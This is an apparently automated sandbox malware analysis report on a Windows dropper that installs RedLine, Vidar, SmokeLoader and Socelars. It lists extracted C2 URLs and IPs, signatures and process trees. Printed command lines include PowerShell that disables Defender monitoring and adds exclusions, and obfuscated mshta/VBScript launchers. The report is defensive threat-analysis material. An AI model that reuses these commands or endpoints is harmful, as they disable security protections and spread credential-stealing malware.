Analysis
-
max time kernel
26s -
max time network
155s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
21/11/2021, 13:56
Static task
static1
Behavioral task
behavioral1
Sample
b0d129a1b07f3501b7737ae293cbba00.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
b0d129a1b07f3501b7737ae293cbba00.exe
Resource
win10-en-20211104
General
-
Target
b0d129a1b07f3501b7737ae293cbba00.exe
-
Size
10.5MB
-
MD5
b0d129a1b07f3501b7737ae293cbba00
-
SHA1
fc48fab64bcbe7a62ad99f1899703ade98f07804
-
SHA256
9ddc809e6e1d32f3c3b1fc1e5382fad699e6336a270bb91fef2a4c0e13f39d14
-
SHA512
2deb70fb4f62bcbf3ecbd3a6205f4fd3dae51820be5ab973fc4367b90bef022c4cf5097e506c6c11d39193b8526756412a4f336b2303d305d15da6acc8f9b403
Malware Config
Extracted
socelars
http://www.gianninidesign.com/
Extracted
metasploit
windows/single_exec
Extracted
redline
user2121
135.181.129.119:4805
Extracted
vidar
48.5
933
https://koyu.space/@tttaj
-
profile_id
933
Extracted
smokeloader
2020
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2676 2896 rundll32.exe 78 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3748 2896 rundll32.exe 78 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
resource yara_rule behavioral1/memory/2328-231-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2328-230-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2328-232-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2328-233-0x0000000000418F06-mapping.dmp family_redline behavioral1/memory/2328-235-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2456-245-0x0000000000418F02-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral1/files/0x0006000000012293-117.dat family_socelars behavioral1/files/0x0006000000012293-138.dat family_socelars behavioral1/files/0x0006000000012293-151.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/2080-298-0x0000000001EE0000-0x0000000001FB5000-memory.dmp family_vidar behavioral1/memory/2080-300-0x0000000000400000-0x00000000004D8000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x000700000001222c-63.dat aspack_v212_v242 behavioral1/files/0x000700000001222c-64.dat aspack_v212_v242 behavioral1/files/0x0007000000012224-65.dat aspack_v212_v242 behavioral1/files/0x0007000000012224-66.dat aspack_v212_v242 behavioral1/files/0x000600000001224f-70.dat aspack_v212_v242 behavioral1/files/0x000600000001224f-69.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 21 IoCs
pid Process 388 setup_install.exe 1676 Wed123d89a91c256e57.exe 1180 Wed12640230114af0.exe 1072 Wed12f0ec01aa0d.exe 1556 Wed126a3d2b0eb7.exe 860 Wed12d2139ce650c689.exe 1680 Wed129e9e1f612b5.exe 1984 Wed1292e7cced8ba.exe 1396 Wed12f0ec01aa0d.exe 1612 Wed12f7252371e9b59.exe 1460 Wed12640230114af0.exe 432 Wed1245c5fe22f.exe 628 Wed12e5a6a551c39b62a.exe 2020 Wed12bf97133ddde4842.exe 1328 Wed12581881318b9e75.exe 2336 Wed12d2139ce650c689.exe 2328 Wed12e5a6a551c39b62a.exe 2456 Wed12d2139ce650c689.exe 2676 rundll32.exe 2704 LzmwAqmV.exe 2728 Wed12f81f1ede1e.tmp -
Loads dropped DLL 64 IoCs
pid Process 560 b0d129a1b07f3501b7737ae293cbba00.exe 560 b0d129a1b07f3501b7737ae293cbba00.exe 560 b0d129a1b07f3501b7737ae293cbba00.exe 388 setup_install.exe 388 setup_install.exe 388 setup_install.exe 388 setup_install.exe 388 setup_install.exe 388 setup_install.exe 388 setup_install.exe 388 setup_install.exe 1008 cmd.exe 1008 cmd.exe 1676 Wed123d89a91c256e57.exe 1676 Wed123d89a91c256e57.exe 1740 cmd.exe 1740 cmd.exe 956 cmd.exe 956 cmd.exe 2032 cmd.exe 1180 Wed12640230114af0.exe 1180 Wed12640230114af0.exe 1072 Wed12f0ec01aa0d.exe 1072 Wed12f0ec01aa0d.exe 1792 cmd.exe 1792 cmd.exe 1072 Wed12f0ec01aa0d.exe 1644 cmd.exe 948 cmd.exe 1488 cmd.exe 860 Wed12d2139ce650c689.exe 860 Wed12d2139ce650c689.exe 1976 cmd.exe 1180 Wed12640230114af0.exe 1612 Wed12f7252371e9b59.exe 1612 Wed12f7252371e9b59.exe 1972 cmd.exe 1972 cmd.exe 432 Wed1245c5fe22f.exe 432 Wed1245c5fe22f.exe 1356 cmd.exe 1356 cmd.exe 568 cmd.exe 628 Wed12e5a6a551c39b62a.exe 628 Wed12e5a6a551c39b62a.exe 1460 Wed12640230114af0.exe 1460 Wed12640230114af0.exe 1328 Wed12581881318b9e75.exe 1328 Wed12581881318b9e75.exe 1556 Wed126a3d2b0eb7.exe 1556 Wed126a3d2b0eb7.exe 1396 Wed12f0ec01aa0d.exe 1396 Wed12f0ec01aa0d.exe 628 Wed12e5a6a551c39b62a.exe 860 Wed12d2139ce650c689.exe 860 Wed12d2139ce650c689.exe 2328 Wed12e5a6a551c39b62a.exe 2328 Wed12e5a6a551c39b62a.exe 2456 Wed12d2139ce650c689.exe 2456 Wed12d2139ce650c689.exe 984 rundll32.exe 2676 rundll32.exe 2676 rundll32.exe 2676 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com 47 ipinfo.io 48 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1072 set thread context of 1396 1072 Wed12f0ec01aa0d.exe 50 PID 628 set thread context of 2328 628 Wed12e5a6a551c39b62a.exe 66 PID 860 set thread context of 2456 860 Wed12d2139ce650c689.exe 68 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 2124 432 WerFault.exe 56 1616 2080 WerFault.exe 80 3052 1280 WerFault.exe 105 -
Kills process with taskkill 5 IoCs
pid Process 2656 taskkill.exe 2964 taskkill.exe 2388 taskkill.exe 2588 taskkill.exe 2568 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Wed126a3d2b0eb7.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Wed126a3d2b0eb7.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1716 powershell.exe 976 powershell.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeCreateTokenPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeAssignPrimaryTokenPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeLockMemoryPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeIncreaseQuotaPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeMachineAccountPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeTcbPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeSecurityPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeTakeOwnershipPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeLoadDriverPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeSystemProfilePrivilege 1556 Wed126a3d2b0eb7.exe Token: SeSystemtimePrivilege 1556 Wed126a3d2b0eb7.exe Token: SeProfSingleProcessPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeIncBasePriorityPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeCreatePagefilePrivilege 1556 Wed126a3d2b0eb7.exe Token: SeCreatePermanentPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeBackupPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeRestorePrivilege 1556 Wed126a3d2b0eb7.exe Token: SeShutdownPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeDebugPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeAuditPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeSystemEnvironmentPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeChangeNotifyPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeRemoteShutdownPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeUndockPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeSyncAgentPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeEnableDelegationPrivilege 1556 Wed126a3d2b0eb7.exe Token: SeManageVolumePrivilege 1556 Wed126a3d2b0eb7.exe Token: SeImpersonatePrivilege 1556 Wed126a3d2b0eb7.exe Token: SeCreateGlobalPrivilege 1556 Wed126a3d2b0eb7.exe Token: 31 1556 Wed126a3d2b0eb7.exe Token: 32 1556 Wed126a3d2b0eb7.exe Token: 33 1556 Wed126a3d2b0eb7.exe Token: 34 1556 Wed126a3d2b0eb7.exe Token: 35 1556 Wed126a3d2b0eb7.exe Token: SeDebugPrivilege 1612 Wed12f7252371e9b59.exe Token: SeDebugPrivilege 1984 Wed1292e7cced8ba.exe Token: SeDebugPrivilege 1716 powershell.exe Token: SeDebugPrivilege 976 powershell.exe Token: SeDebugPrivilege 2568 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 560 wrote to memory of 388 560 b0d129a1b07f3501b7737ae293cbba00.exe 28 PID 560 wrote to memory of 388 560 b0d129a1b07f3501b7737ae293cbba00.exe 28 PID 560 wrote to memory of 388 560 b0d129a1b07f3501b7737ae293cbba00.exe 28 PID 560 wrote to memory of 388 560 b0d129a1b07f3501b7737ae293cbba00.exe 28 PID 560 wrote to memory of 388 560 b0d129a1b07f3501b7737ae293cbba00.exe 28 PID 560 wrote to memory of 388 560 b0d129a1b07f3501b7737ae293cbba00.exe 28 PID 560 wrote to memory of 388 560 b0d129a1b07f3501b7737ae293cbba00.exe 28 PID 388 wrote to memory of 1280 388 setup_install.exe 31 PID 388 wrote to memory of 1280 388 setup_install.exe 31 PID 388 wrote to memory of 1280 388 setup_install.exe 31 PID 388 wrote to memory of 1280 388 setup_install.exe 31 PID 388 wrote to memory of 1280 388 setup_install.exe 31 PID 388 wrote to memory of 1280 388 setup_install.exe 31 PID 388 wrote to memory of 1280 388 setup_install.exe 31 PID 388 wrote to memory of 1512 388 setup_install.exe 30 PID 388 wrote to memory of 1512 388 setup_install.exe 30 PID 388 wrote to memory of 1512 388 setup_install.exe 30 PID 388 wrote to memory of 1512 388 setup_install.exe 30 PID 388 wrote to memory of 1512 388 setup_install.exe 30 PID 388 wrote to memory of 1512 388 setup_install.exe 30 PID 388 wrote to memory of 1512 388 setup_install.exe 30 PID 388 wrote to memory of 956 388 setup_install.exe 32 PID 388 wrote to memory of 956 388 setup_install.exe 32 PID 388 wrote to memory of 956 388 setup_install.exe 32 PID 388 wrote to memory of 956 388 setup_install.exe 32 PID 388 wrote to memory of 956 388 setup_install.exe 32 PID 388 wrote to memory of 956 388 setup_install.exe 32 PID 388 wrote to memory of 956 388 setup_install.exe 32 PID 1512 wrote to memory of 1716 1512 cmd.exe 33 PID 1512 wrote to memory of 1716 1512 cmd.exe 33 PID 1512 wrote to memory of 1716 1512 cmd.exe 33 PID 1512 wrote to memory of 1716 1512 cmd.exe 33 PID 1512 wrote to memory of 1716 1512 cmd.exe 33 PID 1512 wrote to memory of 1716 1512 cmd.exe 33 PID 1512 wrote to memory of 1716 1512 cmd.exe 33 PID 1280 wrote to memory of 976 1280 cmd.exe 34 PID 1280 wrote to memory of 976 1280 cmd.exe 34 PID 1280 wrote to memory of 976 1280 cmd.exe 34 PID 1280 wrote to memory of 976 1280 cmd.exe 34 PID 1280 wrote to memory of 976 1280 cmd.exe 34 PID 1280 wrote to memory of 976 1280 cmd.exe 34 PID 1280 wrote to memory of 976 1280 cmd.exe 34 PID 388 wrote to memory of 1008 388 setup_install.exe 35 PID 388 wrote to memory of 1008 388 setup_install.exe 35 PID 388 wrote to memory of 1008 388 setup_install.exe 35 PID 388 wrote to memory of 1008 388 setup_install.exe 35 PID 388 wrote to memory of 1008 388 setup_install.exe 35 PID 388 wrote to memory of 1008 388 setup_install.exe 35 PID 388 wrote to memory of 1008 388 setup_install.exe 35 PID 388 wrote to memory of 984 388 setup_install.exe 36 PID 388 wrote to memory of 984 388 setup_install.exe 36 PID 388 wrote to memory of 984 388 setup_install.exe 36 PID 388 wrote to memory of 984 388 setup_install.exe 36 PID 388 wrote to memory of 984 388 setup_install.exe 36 PID 388 wrote to memory of 984 388 setup_install.exe 36 PID 388 wrote to memory of 984 388 setup_install.exe 36 PID 388 wrote to memory of 1792 388 setup_install.exe 37 PID 388 wrote to memory of 1792 388 setup_install.exe 37 PID 388 wrote to memory of 1792 388 setup_install.exe 37 PID 388 wrote to memory of 1792 388 setup_install.exe 37 PID 388 wrote to memory of 1792 388 setup_install.exe 37 PID 388 wrote to memory of 1792 388 setup_install.exe 37 PID 388 wrote to memory of 1792 388 setup_install.exe 37 PID 388 wrote to memory of 1740 388 setup_install.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\b0d129a1b07f3501b7737ae293cbba00.exe"C:\Users\Admin\AppData\Local\Temp\b0d129a1b07f3501b7737ae293cbba00.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12f0ec01aa0d.exe /mixtwo3⤵
- Loads dropped DLL
PID:956 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f0ec01aa0d.exeWed12f0ec01aa0d.exe /mixtwo4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1072 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f0ec01aa0d.exeWed12f0ec01aa0d.exe /mixtwo5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1396 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed12f0ec01aa0d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f0ec01aa0d.exe" & exit6⤵PID:2520
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Wed12f0ec01aa0d.exe" /f7⤵
- Kills process with taskkill
PID:2568
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed123d89a91c256e57.exe3⤵
- Loads dropped DLL
PID:1008 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed123d89a91c256e57.exeWed123d89a91c256e57.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12f81f1ede1e.exe3⤵PID:984
-
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f81f1ede1e.exeWed12f81f1ede1e.exe4⤵PID:2676
-
C:\Users\Admin\AppData\Local\Temp\is-AH9AK.tmp\Wed12f81f1ede1e.tmp"C:\Users\Admin\AppData\Local\Temp\is-AH9AK.tmp\Wed12f81f1ede1e.tmp" /SL5="$101AA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f81f1ede1e.exe"5⤵
- Executes dropped EXE
PID:2728 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f81f1ede1e.exe"C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f81f1ede1e.exe" /SILENT6⤵PID:2820
-
C:\Users\Admin\AppData\Local\Temp\is-FNB45.tmp\Wed12f81f1ede1e.tmp"C:\Users\Admin\AppData\Local\Temp\is-FNB45.tmp\Wed12f81f1ede1e.tmp" /SL5="$201AA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f81f1ede1e.exe" /SILENT7⤵PID:2860
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12d2139ce650c689.exe3⤵
- Loads dropped DLL
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12d2139ce650c689.exeWed12d2139ce650c689.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:860 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12d2139ce650c689.exeC:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12d2139ce650c689.exe5⤵
- Executes dropped EXE
PID:2336
-
-
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12d2139ce650c689.exeC:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12d2139ce650c689.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2456
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed126a3d2b0eb7.exe3⤵
- Loads dropped DLL
PID:2032 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed126a3d2b0eb7.exeWed126a3d2b0eb7.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1556 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:2148
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:2656
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed124bd92a370.exe3⤵PID:1696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed129e9e1f612b5.exe3⤵
- Loads dropped DLL
PID:948 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed129e9e1f612b5.exeWed129e9e1f612b5.exe4⤵
- Executes dropped EXE
PID:1680
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12581881318b9e75.exe3⤵
- Loads dropped DLL
PID:568 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12581881318b9e75.exeWed12581881318b9e75.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1328 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPt: cLoSE(CreAteOBJEcT( "WScRIpt.SHelL" ).rUN ("C:\Windows\system32\cmd.exe /C tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12581881318b9e75.exe"" >7xQFL7QGisA~.exE && stArT 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS & iF """" == """" for %C IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12581881318b9e75.exe"" ) do taskkill -iM ""%~NxC"" /F" ,0 , tRue ) )5⤵PID:2156
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C tYpE "C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12581881318b9e75.exe" >7xQFL7QGisA~.exE && stArT 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS & iF "" =="" for %C IN ( "C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12581881318b9e75.exe" ) do taskkill -iM "%~NxC" /F6⤵PID:2624
-
C:\Users\Admin\AppData\Local\Temp\7xQFL7QGisA~.exE7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS7⤵PID:2844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "Wed12581881318b9e75.exe" /F7⤵
- Kills process with taskkill
PID:2964
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1292e7cced8ba.exe3⤵
- Loads dropped DLL
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed1292e7cced8ba.exeWed1292e7cced8ba.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1984 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
PID:2704 -
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"6⤵PID:2912
-
-
C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe"C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe"6⤵PID:2956
-
C:\Users\Admin\AppData\Roaming\7567955.exe"C:\Users\Admin\AppData\Roaming\7567955.exe"7⤵PID:3876
-
-
C:\Users\Admin\AppData\Roaming\1082526.exe"C:\Users\Admin\AppData\Roaming\1082526.exe"7⤵PID:3980
-
C:\Users\Admin\AppData\Roaming\25651493\2565075025650750.exe"C:\Users\Admin\AppData\Roaming\25651493\2565075025650750.exe"8⤵PID:4076
-
-
-
C:\Users\Admin\AppData\Roaming\7342649.exe"C:\Users\Admin\AppData\Roaming\7342649.exe"7⤵PID:1920
-
-
C:\Users\Admin\AppData\Roaming\2311564.exe"C:\Users\Admin\AppData\Roaming\2311564.exe"7⤵PID:3404
-
-
C:\Users\Admin\AppData\Roaming\3959708.exe"C:\Users\Admin\AppData\Roaming\3959708.exe"7⤵PID:2744
-
-
C:\Users\Admin\AppData\Roaming\5782441.exe"C:\Users\Admin\AppData\Roaming\5782441.exe"7⤵PID:2708
-
-
C:\Users\Admin\AppData\Roaming\6857714.exe"C:\Users\Admin\AppData\Roaming\6857714.exe"7⤵PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"6⤵PID:2080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 9807⤵
- Program crash
PID:1616
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"6⤵PID:2000
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"6⤵PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"6⤵PID:2356
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵PID:2564
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568 -
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi9⤵PID:1704
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵PID:1692
-
